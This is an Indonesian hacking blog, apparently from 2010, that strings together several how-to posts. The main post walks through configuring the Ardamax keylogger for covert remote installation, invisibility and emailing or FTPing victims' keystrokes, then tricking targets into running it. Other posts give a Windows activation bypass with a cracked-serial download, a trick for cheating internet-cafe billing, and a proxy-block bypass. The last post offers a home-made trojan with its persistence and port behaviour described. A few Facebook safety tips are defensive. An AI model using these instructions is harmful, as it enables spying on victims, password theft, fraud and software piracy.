Sabtu, 16 Oktober 2010

Cara hack menggunakan keylogger

Artikel ini tidak bermaksud untuk memberitahukan kepada kalian bagaimana cara melakukan tindakan hacking atau menganjurkan kalian untuk melakukan tindakan hacking menggunakan keylogger, hanya untuk berbagi pengalaman dan sharing saja. Sebelumnya, kalo tidak keberatan, sebagai pemanasan silahkan anda baca trik hacking pemula dari kartolo. Karena keylogger ini merupakan trik hacking kelas menengah, karena menyangkut banyak aspek.

Tentang keylogger
Keylogger adalah alat atau metode yang bisa merekam hasil penekanan didalam keyboard yang berupa hardware ataupun software, dengan metode ini maka hasil dari penekanan dari keyboard akan terekam/terbaca dengan lengkap sehingga pengguna keylogger akan leluasa mendapatkan data-data penting yang dimiliki orang lain seperti email, password dll. Saat ini software keylogger bisa di dapatkan dengan mudah di dunia internet dari versi demo hingga full version bisa di download dengan sekali klik saja.

Oke, setelah anda mengerti apa itu keylogger, sekarang kita belajar hack menggunakan keylogger.

Download software keylogger

Kedua adalah melakukan setup pada software tersebut untuk mendapatkan log file yang akan dikirim kepada email yang tersetup pada pilih option pada software ini.

Keterangan Langkah² Menjalankan Keylogger :

1. Email penerima log attachment -> Ini di isi dengan email anda / email penerima hasil dari logging, misal: emailsaya@gmail.com

2. SMTP Server -> Ini diisi dengan SMTP Server yang anda punya, misal: smtp.serversaya.net.id / smtp.indo.net.id

3. Username SMPT server -> Ini diisi dengan username SMTP yang anda dapat dari username SMTP Server, misal: smtpsaya@serversaya.net.id / smtpsaya@indo.net.id

4. Password SMPT server -> Password SMTP, di isi dengan password SMTP Anda :)

Ketiga lakukan remote installation dengan mengcompile file .exe bisa software apa saja.

Untuk melakukan compile remote installation sangat mudah kita dipandu dengan menu Wizard seperti pada gambar diatas.

Terakhir adalah menyebarkan file .exe tersebut kepada komputer target terserah untuk menyebarkannya lakukan dengan cara kalian bagamana agar target mau melakukan install software yang sudah kalian compile. Ini cara hack yang bener benar terbukti.

Sekali terinstal maka semua aktifitas komputer target akan terekam dan tidak terdeteksi oleh Anti virus. Software ini tidak saya complie jadi masih fresh.

Tambahan Cara Instlall Ardamax Keylogger:

1. Setelah menginstal program, ketika menjalankan untuk pertama kalinya akan diminta untuk memasukkan nama dan nomor serial key yang udah include didalam folder ketika di download. Silakan dilihat didalamnya.

2. Setelah mengaktifkannya, langsung dibuka aja. Ketika Anda akan membukanya, Anda akan melihat icon ditambahkan ke dalam sistem tray. Langsung klik saja.

3. Sekarang mari kita klik kanan pada ikon & lalu klik “Remote Installation”.

4. Klik Next. Pada option “Additional components” pilih “Log viewer”.

5. Next lanjut kepada “Invisibility” options. Centangin ajah semuanyabiar mantep Invisibilitynya.


6. Next option “Security”, gak perlu sih, langsung NEXT lagi ajah.
7. Next option “Web Update”, Jangan dicentangin semuanya / terserah sih maunya gimana, yg penting baca dulu perintah & maksudnya, kemudian klik NEXT.
8. Kemudian akan muncul “Options” page. Pilih seperti contoh dibawah ini.

9. Cara dibawah ini harus dipastikan berjalan, klo gak jalan keyloggernya gak akan berhasil. Wajib diperhatikan!!
Pilihlah sesuai dengan keinginan anda. Diharapkan anda menyeting dengan benar



10. Isilah username & password FTP Account yang anda miliki. Seperti penjelasan sebelumnya di tahap awal cara setting FTP.



11. Klik test, untuk melakukan test koneksi, apabila berhasil. Maka dipastikan keylogger anda berjalan dengan baik.



12. Next ke “control” page, aturnya sesuai keinginan dah. Klo gak tau ya lewatin ajah.
13. Next ke “Screen shot”, Klik Next ajah klo sudah tau artinya itu mah.

14. Silakan pilih file untuk generate keylogger file.


15. Selesai!
16. Silakan gunakan dengan baik :)
Catatan: Deactivate sementara anti virus anda, kadang ini terdeteksi sebagai admx virus / keylogger. Enjoy & Eat It!

UPDATE:
Download Ardamax v3.0 + Include Serial Key

Bermacam-macam keylogger yang bisa digunakan:

Download berbagai macam Keylogger

Ingat, hacking bukan cracking untuk merusak, namun untuk belajar.

sumber: http://www.binushacke....-hack.html

Menghilangkan Windows Genuine Advantage (WGA) Notification

Windows Genuine Advantage(WGA) adalah fitur validasi keaslian windows yang akan memunculkan peringatan jika windows kita tidak asli. Fitur ini akan muncul jika kita rajin online, makanya yang paling sering kena WGA ini adalah laptop yang sering digunakan untuk online. Jika tidak pernah online, maka tentu microsoft tidak akan dapat mengetahui apakah windows anda asli atau tidak.

Windows yang terdeteksi WGA ini dapat menyebabkan antara lain background desktop menjadi hitam, wallpaper tidak muncul dan selalu terdapat peringatan Windows Genuine Advantage. Memang apabila anda menginstall ulang, peringatan WGA bisa saja hilang. Tapi tentu sangat merepotkan karena semua program harus anda install kembali. Namun hanya dengan menginstall ulang windows bukan berarti WGA notification itu tidak muncul lagi.

Ada cara mudah untuk menghilangkan Windows Genuine Advantage, anda cukup me-rename extension dari wgalogon dan wgatray. Selain itu, sebenarnya untuk membuat genuine windows XP sangat mudah, namun berhubung kini XP sudah tidak laku lagi, berikut langkah-langkahnya untuk Windows 7.

- Buka folder system32 yang terdapat di C:\Windows\System32
- Cari file wgalogon.dll & ganti namanya menjadi wgalogon.dll.bak
- Klik kanan pada bagian kosong (folder System32) & pilih New » Text Document dan simpan dengan nama wgalogon.dll
- Cari file wgatray.exe & ganti namanya menjadi wgatray.txt
- Klik kanan pada bagian kosong & pilih New » Text Document dan simpan dengan nama wgatray.exe
- Ganti LegitCheckControl.dll menjadi LegitCheckControl.dll.bak & buat Text Document dengan nama legitcheckcontrol.dll dan simpan di folder System32
- Restart komputer anda!
- Jangan lupa menonaktifkan automatic updatenya dengan klik kanan MyComputer » Klik tab Automatic Update » Pilih Turn Off

1. Manual Method

- Matikan automatic update nya > klik kanan My Computer > properties > klik tab automatic update > klik turn off > OK
- Masuk ke regedit > HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify.
- hapus folder ‘WgaLogon’ dan semua isi nya
- Restart komputer, kemudian masuk pada safe mode dengan menekan tombol F8 saat booting.
- Cari dan hapus file-file dibawah ini


C:\WINDOWS\system32\WgaLogon.dll
C: \WINDOWS\system32\WgaTray.exe
C:\WINDOWS\system32\LegitCheckControl.dll


- selesai. restart windows anda.

2. Cara Otomatis(Menggunakan Software)

Khusus untuk win 7 tidak perlu repot, cukup download software windows 7 loader activator remOVEWAT. Kemudian instal dan jalankan, setelah running dia akan minta restart. jangan lupa non-active kan update windowsnya agar tidak ada lagi Windows Genuine Advantage Notification

Facebook scream by attack!

Facebook dan situs jejaring sosial diserang oleh worm virus, umumnya dikenal sebagai Koobface. Ini adalah serangan kelima agar dalam beberapa hari terakhir! Worm ini akan menyebar dari account Anda ke semua teman-teman Anda jika Anda menjadi terinfeksi. Koobface mencari cookie yang disimpan pada komputer Anda oleh situs jejaring sosial seperti facebook, Netlog, myspace, bebo, Fubar, friendster dan LiveJournal. Menghindari ini jengkel dengan mengikuti tips di bawah ini.

menyembunyikan virus jahat di direktori Windows, dengan kedok 'freddy35.exe', dan mengambil kendali dari komputer Anda dengan menyebarkan dirinya ke orang lain dari komputer Anda. Pesan yang LIHAT seperti mereka dari teman-teman mungkin berisi link juga. Selidiki sebelum Anda klik. Seringkali subjek akan berisi baris yang serupa dengan ini:! Funny Moments, Paris Hilton lemparan Dwarf di Jalan, Teman saya ditangkap (sic) Anda di cam tersembunyi, Hello Anda Harus Melihatnya LOL Mungkin ada link ke video YouTube juga. Curb dorongan untuk klik! Anda bahkan mungkin akan diberitahu untuk memperbarui aplikasi Flash. Ini adalah tipu muslihat ... mengabaikannya.

Langkah yang paling penting adalah: JANGAN klik pada link apapun di situs tersebut. Cacing ini sering ditemukan di kotak masuk pada situs-situs jaringan sosial. Yang saya menerima hari itu dari seseorang bernama Julaa, memerintahkan saya untuk klik pada link untuk melihat 'sesuatu yang sangat penting'. Meskipun sulit untuk melawan garis menarik seperti itu, aku menolak, dan saya bersyukur aku melakukannya.

Ingat pepatah lama: Jika kedengarannya terlalu bagus untuk menjadi kenyataan, mungkin adalah. Waspadalah! Mengekang rasa ingin tahu Anda. JANGAN acak klik link apapun.

Sekarang Anda tahu apa yang harus diperhatikan, akan PASTIKAN Anda memiliki firewall yang aktif dan perlindungan virus sampai dengan saat ini. Sebuah GRATIS yang sangat baik anti-virus program.

Facebook virus

Menghindari Facebook dari Virus.

Tak bisa di pungkiri bahwa Facebook sedang mengalami masa-masa jayanya saat ini. Jutaan user sudah terdaftar di jejaring sosial ini.

Tapi perlu diwaspadai juga bahwa perkembangan facebook juga menarik minat para hacker , cracker dan para pembuat virus untuk mencoba mengambil keuntungan dari situs ini dengan cara menyebarkan virus, mengambil data pribadi dan sebagainya.

Untuk mengatasi hal tersebut, Berikut beberapa tips bagaimana cara menghindari Facebook anda dari terkana virus.



1. Berhati-hatilah dalam menginstal aplikasi. Yang terbaik adalah tidak menginstal aplikasi Facebook yang dikirimkan oleh orang tidak dikenal terutama bagi aplikasi-aplikasi aneh yang tidak umum terdapat dalam Facebook.

2. Cek lebih teliti sebelum menginstal aplikasi. Sebelum menginsatal aplikasi Facebook, pertama kalli yang harus dilakukan adalah mengecek daftar dan review hasil scan. Bacalah dengan teliti sebelum Anda menginstalnya. Jika tidak, virus akan mudah mengintai Anda.

3. Tidak mengklik link yang terlihat aneh. Jika dirasa link tersebut terdapat kejanggalan, lebih baik jangan mengkliknya. Jika dikatakan link tersebut berasal dari salah satu teman Anda, sebaiknya konfirmasi terlebih dahului pada teman tersebut. Bisa saja si pengirim link berpura-pura menjadi teman Anda.

4. Pastikan aplikasi itu bukanlah sesuatu yang mengharuskan Anda untuk melakukan verifikasi identitas yang lengkap dan rahasia. Anda patut berhati-hati dengan infirmasi yang diposting ketika akan mengakses game Facebook dimana para penggunananya harus membagi 25 fakta secara acak berkaitan dengan diri dan teman-teman Anda.


5. Beri pertanyaan tambahan untuk melindungi akun Anda. Cara ini akan membantu untuk membuktikan identitas andai sewaktu-waktu informasi akun Anda dicuri orang lain.

6. Laporkan setiap spam dan kejanggalan yang Anda temukan pada akun Anda melalui link yang telah disediakan oleh Facebook.

7. Waspada dengan situs-situs yang mirip dengan Facebook. Jangan mudah memasukkan password kecuali Anda benar-benar yakin berada dalam situs Facebook yang asli.

8. Lindungi password Anda. Jangan gunakan password yang sama dengan yang Anda gunakan untuk situs lain. Yang lebih penting lagi, jangan pernah memberitahukan password pada siapapun.

9. Meski Anda tidak menggunakan Facebook, ada baiknya membuat profil pada situs-situs tertentu. Hal ini untuk menghindari agar tidak ada orang yang menggunakan nama dan profil Anda untuk mengelabui orang lain.

Get Facebook Texas Hold Em Chip for Free

Facebook Texas Hold'em yang paling favorit dalam permainan untuk beberapa pengguna facebook peoles. Di sini, di halaman ini akan memberitahu Anda tentang berbagai poker cheats agar saat tersedia. Sejumlah cheats datang untuk poker Zynga agar dari waktu ke waktu, dan meskipun ini secara berkala tertangkap dan diblokir oleh Facebook, yang sering dikembangkan.

Karena cheats dikembangkan sering, metode untuk memperoleh chip dapat bervariasi. Kadang-kadang, cheats ini adalah metode sederhana untuk mempekerjakan, sedangkan waktu lainnya hack dapat digunakan untuk menambahkan uang ke account poker Anda atau membuat kartu tertentu tersedia lebih sering. Halaman ini akan menyediakan link ke cheats saat ini dan akan memberikan informasi tentang ketersediaan dan konsekuensi dari menggunakan cheats.

Selain dari Facebook, Zynga Poker juga bisa diputar di MySpace dan MyYahoo. Permainan yang sebenarnya adalah Texas Hold Em. Dalam rangka untuk bermain Zynga Poker, pemain harus memiliki Adobe Flash. Pemain bisa memperoleh poker chips chip tambahan dengan menerima bonus harian dikirimkan oleh teman-teman. Permainan ini juga memiliki fitur kontes seperti Shoutout Grand Prize of the Week serta Turnamen Mingguan. Pada bulan Juli tahun 2010 Poker Zynga agar yang ditawarkan chip gratis dan hadiah selama kontes "Summer Fun" jam. hadiah lain termasuk barang-barang seperti t shirt Poker Zynga-.

Poker Facebook Cheats
Sebuah umum cheat digunakan adalah "hantu" cheat, dimana pemain menggunakan akun Facebook alternatif untuk membuat pemain hantu di meja nya. Dengan cara ini, pemain memiliki kesempatan yang lebih tinggi untuk menang dengan bermain sebagai dua atau lebih pemain pada saat yang sama di meja yang sama.

Beberapa dan hacks cheats telah dikembangkan untuk membantu pemain mendapatkan poker chips lebih cepat daripada mereka yang diperoleh melalui permainan normal. Harap diperhatikan bahwa cheats bertentangan dengan ketentuan layanan dari permainan masing-masing, dan menggunakan mereka menempatkan akun game Anda beresiko. Halaman ini berisi link ke cheats yang tersedia, tetapi karena komunitas pengembang dan permainan memantau aktivitas terlarang, cheats yang tersedia mungkin terbatas dan sering diubah.

Jumat, 15 Oktober 2010

Trik Menyedot Bandwith

Skrg ane mau kasih tau gimana caranya menyedot bandwith biar koneksi internet agak kuenceng.

Pertama buka Browser Mozilla Firefox.Kemudian pada Address Bar Ketik : about:CONFIG. Trus cari string di bawah ini : ( pastikan semua srting dibawah “TRUE”)

contoh menggantingnya :
NETWORK.HTTP.PIPELINING FALSE ==> klik kanan dan pilih “Toggle”
NETWORK.HTTP.PIPELINING TRUE
NETWORK.HTTP.PIPELINING.MAXREQUESTS 64
NETWORK.HTTP.PROXY.PIPELINING TRUE
NETWORK.PROXY.SHARE_PROXY_SETTINGS FALSE >INTEGER[/b]


Ketik : NGLAYOUT.INITIALPAINT.DELAY Beri Nilai 0. Kemudian REFRESH atau Tekan F5. Lalu pada Address Bar Ketik : about:BLANK

Klik Menu:
Untuk OS Windows XP TOOLS>>OPTIONS>>WEB FEATURES
Untuk OS Linux ( Vector ) EDIT >> PREFERENCES
Untuk Setting yang berbeda di beberapa OS EDIT >>ADVANCED

Pada Option :
ALLOW WEB SITES TO INSTALL SOFTWARE Beri Tanda Check Box Untuk mengaktifkan. Kemudian Tekan OK Lalu REFRESH ( F5 )

Sampe sini bisa ngikutin??? Ok lanjut...


Masuk Ke Link Ini :
https://addons.mozilla.org/extension…firefox&id=125
atau :
https://addons.mozilla.org/extension…ltered=firefox. Download Software SwitchProxy Tool Versi 1.3.4. Setelah Selesai Jangan Tekan Tombol UPDATE, klik Tanda X (tutup)Yang Ada Di Pojok Kanan Atas Dari POP UP Window Yang Muncul.

Tutup Semua Browser Mozilla FireFox, kemudian Buka Lagi Untuk Mengaktifkan Software SwitchProxy Tool Versi 1.3.4 Yang sudah di Install Tadi. Nah kalo kamu sukses menginstalnya, akan Muncul Toolbar tambahan Di Bawah Toolbar Navigasi & Address Bar.

Sekarang Browser Mozilla Siap Untuk Digunakan…….
:: Message ::
– Software SwitchProxy Tool Versi 1.3.4 Ini selain untuk Mengganti Proxy Secara Otomatis Di Browser Mozilla FireFox, Engine-nya Juga Berpengaruh terhadap Kecepatan Koneksi Internet
– Cara Ini Sangat Efektif Bila Digunakan Di Warnet Yang Padat Pengunjung untuk Menyedot Bandwidth ( Mayoritas kecepatan akses Internet ) Ke Komputer Yang Sedang Anda Pakai
– Perubahan Yang Signifikan Terjadi Pada koneksi Internet Dengan BROADBAND / VSAT
Klik 2x di settingan dan masukin angka-angka ini - untuk true / false booleans – mereka bakal ganti otomatis begitu klik 2x
Code:
browser.tabs.showSingleWindowModePrefs – true
network.http.max-connections – 64
network.http.max-connections-per-server – 20
network.http.max-persistent-connections-per-proxy – 10
network.http.max-persistent-connections-per-server – 4
network.http.pipelining – true
network.http.pipelining.maxrequests – 100
network.http.proxy.pipelining – true
network.http.request.timeout – 300
network.http.request.max-start-delay = 0
nglayout.initialpaint.delay = 0
If nglayout.initialpaint.delay doesnt exist, Right click, new integer.
Optional:

Code:
network.http.max-persistent-connections-per-proxy = 10
network.http.proxy.pipelining = true
network.http.proxy.version = 1.0
Tutup mozilla trus jalanin lagi.
Next tip:
Buka Firefox………ketik “about:config” (enter)
cari :Network.dns.disableIPv6

Klik 2x buat ngerubah jadi ‘true’ trus restart Firefox.
nglayout.initialpaint.delay bisa dirubah yg mana aja…bisa 0 bisa 300 ada juga yg set 30…tergantung kebutuhan…..coba 0 dulu…baru nanti kl ga ada perubahan naikan ke 300 atau nilai yg dirasa memuaskan

For ADSL:
Code:
1. Type: about:config
2. Set:
network.http.max-connections : 64
network.http.max-connections-per-server : 21
network.http.max-persistent-connections-per-server : 8
network.http.pipelining : true
network.http.pipelining.maxrequests : 100
network.http.proxy.pipelining : true
3. Lastly right-click anywhere and select New-> Integer. Name it “nglayout.initialpaint.delay” and set its value to “0″. This value is the amount of time the browser waits before it acts on information it recieves. (Copy from TvM)[/code]

For Dial_up:
Code:
browser.cache.disk_cache_ssl : true
browser.xul.error_pages.enabled : true
content.interrupt.parsing : true
content.max.tokenizing.time : 3000000
content.maxtextrun : 8191
content.notify.backoffcount : 5
content.notify.interval : 750000
content.notify.ontimer : true
content.switch.threshold : 750000
network.http.max-connections : 32
network.http.max-connections-per-server : 8
network.http.max-persistent-connections-per-proxy : 8
network.http.max-persistent-connections-per-server : 4
network.http.pipelining : true
network.http.pipelining.maxrequests : 8
network.http.proxy.pipelining : true
nglayout.initialpaint.delay : 750
plugin.expose_full_path : true
signed.applets.codebase_principal_support : true


nah, sekarang kalo si empunya warnet pengen cegah client nydot bandwith, bisa ikuti cara di bawah

> kalo untuk mencegah client menyedot bandwith, coba aja netlimiter, tapi
tiap
> client harus diinstall program ini. Kemudian di hide-kan netlimiternya
pake
> systrayxv. Kalo pake win2000 pake bandwidth controller, diinstal di
> servernya. Kasih aja bandwidth 2 kbps...hehehe....biar lemotttttttt.

mau nanya tentang bandwidth controller.
Apakah pengaturan bandwidth di bandwidth controller juga bisa
burstable?
Misal ada kasus seperti ini.

--server --hub ---- client 1
---- client 2
---- client 3

Total bandwidth 64 kbps.
Untuk client 1 = 32 kbps
Untuk client 2 = 20 kbps
Untuk client 3 = 12 kbps

Kalo ketiga client semua download, masing-masing client
akan mendapatkan bandwidth sebesar alokasi tersebut.

Tetapi jika hanya client 2 dan 3 saja yang download, apakah
bandwidth client 1 bisa dipinjamkan ke client 2 dan 3, dibagi
rata?
sehingga saat client 1 mati, client 2 mendapatkan 20 + (32/2) = 36 kbps.
dan client 3 akan mendapatkan 12 + (32/2) = 28 kbps.

Trik lainnya juga anda bisa menggunakan software netcut. Cara penggunaanya sangat mudah, namun akan saya bahas dalam posting selanjutnya.

Menjebol Proxy Server Dengan IP Desimal


Topik ini saya dapatkan waktu jalan-jalan di Jasakom, mungkin ada sebagian teman-teman yang sedikit bingung maksud dari judul postingan saya ini apa sih? nih saya jelaskan... bagi anda pegawai kantoran, yang suka internetan di warnet, dll biasanya kan suka buka-buka situs favorit kaya Facebook, Youtube, situs Bokep (heheheehehe,ketahuan deh) dll. terus tiba-tiba halaman website anda tak bisa terbuka karena di block oleh admin (Blocked by Proxy server, seperti lagu saykoji.. hehehe) ato sama ISP anda, ato Warnet dan atau kantor anda (pasti anda marah besar kan?)



tapi mau di apa? memang sudah aturanx gak boleh buka situs2 itu di jam kerja ato ditempat itu. tapi anda sudah terlanjur terkontaminasi sama situs tersebut. jengkelnya bukan main kan? nah bagaimana untuk menjebol proxy server tadi?

Anda mau tau caranya? wokehlah kalau begitu... silahkan cek di TKP





Ikuti langkah-langkah berikut ini...

1. Buka cmd

Start >> All Programs >> Accesories >> Command Prompt




2. ketik ping site yang terblock untuk kita lihat ip addressnya...

disini saya mencontohkan http://www.youtube.com

jadinya seperti ini :



ping www.youtube.com



maka kita dapat melihat ip addressnya yaitu :

208.177.236.70



3. masukkan IP tadi ke alamat website ini :


www.allredroster.com(tanpa titik yah) kemudian klik Calculate



Desimal dari alamat ip 208.177.236.70 adalah HTTP://3497389126



4. Setelah ketemu pindahkan HTTP://3497389126 ke browser kesayangan anda!

Mengatur Sistem Komputer Tanpa Melalui Registry

Cara ini dipake buat ngegantiin fungsi registry. Misalnya aja registrynya di

disable atau andaikan bisa di buka registrynya, ga memperbolehkan untuk

mengedit stringnya kecuali administrator. Nah kita ga bisa apa apa kan...Lha

trus gimana?


Cara ini pernah gue pake waktu kompi di skul gue [ dalam jaringan LAN ] di

disable registrynya. Trus pas udah bisa kebuka, ga bisa di edit stringnya :p~

Woi, pke cerita segala loe!! :p Caranya yang pertama, buka explorer. Masuk ke

c:\windows\system32 Cari file yang namanya 'gpedit'. Klik aja 2 kali.

Di sebelah kiri ada tulisan Local Computer Policy, trus di situ ada pilihan

'Computer Configuration' dan 'User Configuration'. Nah dari situ kita bisa utak

atik aj.. :p

Misal [ yang pernah gue utak atik ]: Kita masuk Computer Configuration,

Administrative templates, Windows Components, Security Center, Turn on


Security Center. Trus klik 2 kali, pilih disable buat matiinnya.

Contoh laen:



Computer Configuration\Administrative templates\System\Group

Policy\Registry policy processing

User Configuration\Administrative templates\Windows Components\Terminal

Service\Client\Do not allow passwords to be saved

User Configuration\Administrative templates\Start Menu and

Taskbar\remove Logoff on the Start menu


User Configuration\Administrative templates\Desktop\Hide and disable

all items on the desktop

User Configuration\Administrative templates\Desktop, Active

Desktop\Disable all items

User Configuration\Administrative templates\Control Panel\Add or Remove

Programs\Remove Add or Remove Programs

User Configuration\Administrative templates\System\Crtl+Alt+Del

Options\Remove Task Manager

User Configuration\Administrative templates\System\Crtl+Alt+Del


Options\Remove Logoff

Segitu aja yah contoh contohnya. Yang lainnya bisa kembangin sendiri. Dengan

cara itu kita bisa ancurin tuh kompi. Hehehehe

Tapi itu semua cuma buat pembelajaran aja yah.. :)

Cara Sederhana Proteksi File *.Exe Dari Virus [ Tanpa Anti Virus ]

Pemakaian anti virus belum tentu jaminan klo kompi bakal bebas virus, trojan,

worm.. Ataupun klo make firewall atau anti virus RTS [ real time system ] juga

ga bakal jamin bebas virus. Apalagi firewall dan anti virus RTS bakal bikin

kompi lebih lambat. Cara ini gue pake buat ngelindungin file dengan extensi exe

atau aplikasi.





Pertama pake search [ lewat start menu ] trus pilih 'all files and folders'. Ketik di


bagian 'All or part of the file name' : *.exe --->mencari file berextensi .exe Pada

bagian Look ini, pilih my computer aja. Search aja langsung.Kalo udah blok

semua file [ pke Ctrl + a ], trus klik kanan, pilih properties.

Pada attribut pilih 'read only'. Dengan memakai attrib read only, file file tersebut

hanya bisa di liat/di buka aja. So virus ga bisa merusak atau merubah file file

tersebut. kalo perlu tambahin aja attribut hidden.

Atau pake cara yang lebih gampang lewat command promt. Caranya buka

command promt, masuk ke drive C. Misal saat membuka command promt,


tampilan yang keluar biasanya

C:\Documents and Settings\user

nah buat kembali ke drive C, ktik aja : 'c..' [ tanpa tanda petik ]

sampai masuk ke C:\

Trus ketik: attrib +r *.exe

Untuk menambah attrib hidden, tambahin aja : +h

Gitu aja yah..Moga membantu.

Mencurangi (hampir) Semua Jenis Billing Warnet

Ditujukan oleh newbie2 laennya. Buat mas-mas dan om-om yang merasa udahmerasa pinter ato udah tau caranya sangat disarankan untuk tidak usah

membaca artikel ini karena hanya membuang2 waktu anda yang sangat

berharga.

Cara ini saya dapetin pas kantong lagi kempes tapi nafsu online lagi tinggi :)

Setelah muter2 otak sebentar sambil tidur, akhirnya kutemukan cara buat


ngakalin billing warnetnya buat ngirit ongkos online.

Kalau cara yang ada di X-Code Magz vol4 itu cuma bisa untuk Billing

Explorer(memang bisa, saya sudah membuktikannya)

Cara ini berlaku untuk segala versi billing explorer dan kebanyakan aplikasi

billing lainnya. Dan merupakan kelemahan semua billing warnet yang berbasis

windows!!!

Penasaran mau tau caranya ? Baca aja sampai habis !

Skali lagi saya ingatkan buat anda yang merasa udah pinter diharapa ga usah

baca, kecuali pengen mati kebosanan (niru kata-kata siapa ya?:)


Ini dia caranya ...

Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat

windows dimulai adalah login screen client billing yang menutupi seluruh area

windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable

untuk memaksa kita login melalui program billing itu.

Sebenarnya saat kita menghadapi login screen itu komputer sudah siap

dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah...



udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya.


Daripada mati kebosanan :)

Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela

login itu tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah

satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang

menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan

adalah progie yang anda gunakan harus bisa show/hide window pake hotkey

coz windows kita kan ditutupi sama login screen sialan itu.

Yang harus disiapkan:

1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe


    setengah isi disket. Aku nemu progie kalo ga salah di bonus CD Chip. Dah lupa

    edisi yg keberapa.

2. Muka bego

3. Mental yang kuat

Langkah-langkahnya:

01. Masuk warnet dan pasang muka bego biar ga dicurigai operator

02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong.

      Biar ga dicurigai juga sih.


03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu

      kosong apa nggak.

04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.

05. Saat masuk login screen, login aja seperti biasa.

06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada,

      cari aja pake google.

07. Setelah ZHider dijalankan langsung aja logout.

08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan


      Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!

09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan

      aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing

      server kelihatan masih ada yang belum login.

10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login

      screen yang menghilang entah kemana:)

11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif


      sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.

12. Logout. SIapkan muka bego, lalu bayar tarif.

     Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu.

Apalagi bila si op sering keluyuran.

Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan

baca file readme yang disertakan bersama zhider

CTRL+ALT+Z Menyembunyikan jendela aktif

CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan


CTRL+ALT+L Menampilkan dialog zhider

CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan,

dan juga menutup zhider.

      Kalo cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya

perbuatan jahatmu tidak diridhai Tuhan :)

Kalo ketahuan langsung pertebal "muka bego"-mu. Misalnya bilang "Eh, kok jadi

gini ya? Kemaren ga gini kok." Ato kata-kata lain, tergantung kreatifitas anda.

Penulis tidak bertanggung jawab atas kerugian yang ditimbulkan atas


penggunaan artikel ini (Use at Your Own Risk)

XRemote (Trojan Dan Remoter PC Berbasis Windows)

Pengantar


Pertama, Saya ingin menyampaikan salam perkenalan kepada seluruh rekan staff Yogyafree dan juga

untuk semua pembaca X-CODE magazine. Tujuan dari penulisan artikel ini adalah sebagai kontribusi

untuk menggembangkan komunitas Yogyafree. Artikel ini dipersembahkan dengan segala

kerendahan hati tanpa ada maksud untuk menggurui. Penulis artikel ini bukan dan belum pantas

disebut sebagai Hacker. Penulis hanya seorang pemerhati komputer,internet, hacking dan security. Jika

ada kesalahan baik dalam penulisan maupun kata-kata yang mungkin menyinggung mohon

dimaafkan.

Topik Artikel


Baiklah, saya langsung saja ke topik. Seperti yang telah kita ketahui. Trojan adalah salah satu contoh

kreativitas seorang hacker untuk mengendalikan komputer korbannya dalam jaringan (Definisi Trojan

tidak akan dijelaskan disini, bagi rekan yang ingin mengetahui lebih jelas tentang Trojan dapat disearch

melalui google dengan keyword “define:Trojan”). Trojan sudah lama eksis di dunia internet

dan Trojan yang terkenal adalah Netbus, BackOriffice. Trojan terdiri dari dua bagian, yaitu

“client/remoter“ (program pengontrol yang di-install ke komputer kita) dan “server/slave” (program


yang di-install ke komputer korban supaya dapat dikendalikan dari komputer kita).

Pada artikel ini saya ingin membagikan Trojan buatan sendiri. XRemote. Dapat di download di
http://www.ziddu.com/download/4080315/Xremote.zip.html atau disini (Mas kurniawan, masukkin aja link

langsung dari yogyafree.net). Harap baca terlebih dahulu README.txt di dalam file zip sebelum

anda meng-install ke dalam komputer pribadi. Trojan yang dibuat dengan Visual Basic ini

berdasarkan referensi dari penulis Trojan Vortex dan beberapa penulis Trojan Underground lainnya.

Trojan ini juga disertakan beberapa tool tambahan seperti port scanner dan ICMP flooder. Trojan

XRemote masih dalam tahap uji coba dan mungkin masih banyak Bugs yang tidak disadari oleh


penulis.

Instalasi & Penggunaan

Setelah file selesai anda download, ekstrak ke C:\temp atau tempat lain sesuka anda. Anda akan

menemukan 2 folder yaitu : XremoteClient dan XremoteServer di C:\temp.

1. Instalasi dan proses server trojan (“services.exe”)

Hal pertama yang perlu diperhatikan. Jika anda ingin mencoba meng-install “services.exe” di


komputer pribadi anda, saya rasa ada baiknya anda membuat restore point untuk mengatisipasi

kemungkinan terburuk yang akan terjadi. Tetapi bagi rekan-rekan yang sudah pada tahap Geek, Trojan

“services.exe” Xremote ini tidak akan menjadi permasalahan serius.

Adalah sebuah usaha yang perlu anda lakukan untuk meng-install “server” ke komputer lawan (saya

yakin anda lebih kreatif dan lebih jahat dari saya.. hahahaha). Setelah komputer korban terinfkesi,

maka proses yang akan dilakukan oleh server Trojan adalah:


• Trojan meng-copy dirinya ke C:\WINDOWS\system\services.exe

• Trojan membuat nilai registry di

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sehingga Trojan akan aktif

setiap kali windows startup.

• Trojan membuka koneksi TCP/IP melalui port 1001 dan port 999.

• Jika di komputer korban ter-install mIRC di C:\program files\mIRC\ maka Trojan akan

mengubah file aliases.ini , script.ini, perform.ini (file pendukung mIRC). Akibatnya ketika


korban menjalankan mIRC setelah terinfeksi Xremote, maka korban akan secara otomatis join

